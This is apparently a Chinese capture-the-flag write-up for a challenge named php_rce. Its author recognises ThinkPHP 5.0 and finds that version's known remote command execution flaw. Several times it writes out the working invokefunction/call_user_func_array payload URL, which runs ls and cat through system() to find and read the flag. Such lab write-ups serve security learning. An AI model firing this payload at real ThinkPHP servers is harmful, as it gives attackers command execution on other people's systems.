php_rce
没有题目描述,直接打开链接
看到这一脸懵,试了几种常用的方法,什么也没发现,于是从内容入手,百度一下thinkphp 5.0版本,发现这个版本存在远程执行命令的漏洞,对漏洞这方面不了解,网上查找一下这个版本的漏洞
漏洞链接
找到了payload
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
没有发现flag,于是…/返回上一级目录/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20…/
多次返回后发现flag用cat命令读取flag
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20…/…/…/flag
发现flag
对漏洞方面不了解,还需要提升
文章参考链接:https://blog.csdn.net/xj28555/article/details/107162132/
2020.7.8 公瑾